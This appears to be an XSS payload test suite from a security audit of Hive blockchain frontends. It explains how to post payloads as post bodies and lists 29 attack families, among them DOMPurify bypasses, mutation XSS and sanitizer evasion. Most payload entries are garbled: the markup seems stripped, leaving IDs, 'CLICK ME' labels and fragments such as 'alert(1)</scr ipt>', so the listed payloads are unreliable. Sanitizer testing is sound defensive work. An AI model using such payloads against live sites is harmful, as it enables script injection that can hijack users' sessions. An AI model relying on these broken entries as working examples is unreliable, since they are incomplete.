XSS Payload Test Suite for Hive Frontends
⚠️ FOR AUTHORIZED TESTING ONLY
Do not use against systems without explicit written permission.
Report ID: AUDIT-20260322
Auditor: louis88
Purpose: Post each payload as a Hive blockchain post body to test sanitization
across condenser and other Hive frontends. All payloads use alert(1) or
alert(document.domain) as a benign proof-of-concept indicator.
How to use: Each section contains payloads wrapped in markdown code fences
for reference, followed by the raw payload to copy. Test each payload as:
- A standalone post body
- Wrapped in
<html>...</html> tags (triggers the raw HTML path in MarkdownViewer)
- Inside a markdown paragraph mixed with normal text
- As a comment on an existing post
Table of Contents
- Standard Vectors
- HTML Tag Event Handlers — Exhaustive
- SVG Vectors
- MathML Vectors
- HTML5 Semantic & Obscure Tags
- Encoding Bypass Vectors
- Unicode & Character Tricks
- CSS-Based Vectors
- Markdown-Specific Vectors
- Mutation XSS (mXSS)
- DOM Clobbering Chains
- Template & Framework-Specific
- Protocol Handler Abuse
- Meta & Base Tag Injection
- Form & Input Hijacking
- Object, Embed & Applet
- Media Elements
- Focus & Autofocus Chains
- Animation & Transition Events
- Content-Editable & Designmode
- Polyglot Payloads
- DOMPurify Specific Bypasses
- Condenser html-Wrapper Path
- Dangling Markup Injection
- Tab-Nabbing & Window Reference
- Exotic Attribute Vectors
- Regex Sanitizer Bypass Techniques
- Obfuscation & Evasion Techniques
- Payload Chaining & Multi-Stage
1. Standard Vectors
Classic payloads that every sanitizer should catch. If any of these fire, the sanitizer is fundamentally broken.
XSS-STD-001
alert(1)
XSS-STD-002
XSS-STD-003
alert(String.fromCharCode(72,105))
XSS-STD-004
alert(1)
XSS-STD-005
alert(1)
XSS-STD-006 — Script with CDATA (XHTML context)
/**/
XSS-STD-007 — Closing existing tag context
alert(1)
XSS-STD-008 — Closing textarea context
alert(1)
XSS-STD-009 — Closing noscript context
alert(1)
XSS-STD-010 — Line breaks in tag
alert(1)</scr
ipt>
2. HTML Tag Event Handlers — Exhaustive
Comprehensive list of every HTML event handler attribute. Many sanitizers only block onerror and onload but miss obscure handlers.
2.1 Mouse Events
XSS-EVT-001
![]()
XSS-EVT-002
HOVER ME
XSS-EVT-003
HOVER ME
XSS-EVT-004
HOVER THEN LEAVE
XSS-EVT-005
CLICK ME
XSS-EVT-006
CLICK ME
XSS-EVT-007
MOVE OVER ME
XSS-EVT-008
LEAVE ME
XSS-EVT-009
CLICK ME
XSS-EVT-010
DOUBLE CLICK
XSS-EVT-011
RIGHT CLICK ME
XSS-EVT-012
SCROLL ON ME
2.2 Keyboard Events
XSS-EVT-013
XSS-EVT-014
XSS-EVT-015
2.3 Load / Lifecycle Events
XSS-EVT-016
XSS-EVT-017
![]()
XSS-EVT-018
XSS-EVT-019
XSS-EVT-020
XSS-EVT-021
XSS-EVT-022
XSS-EVT-023
![]()
XSS-EVT-024
XSS-EVT-025
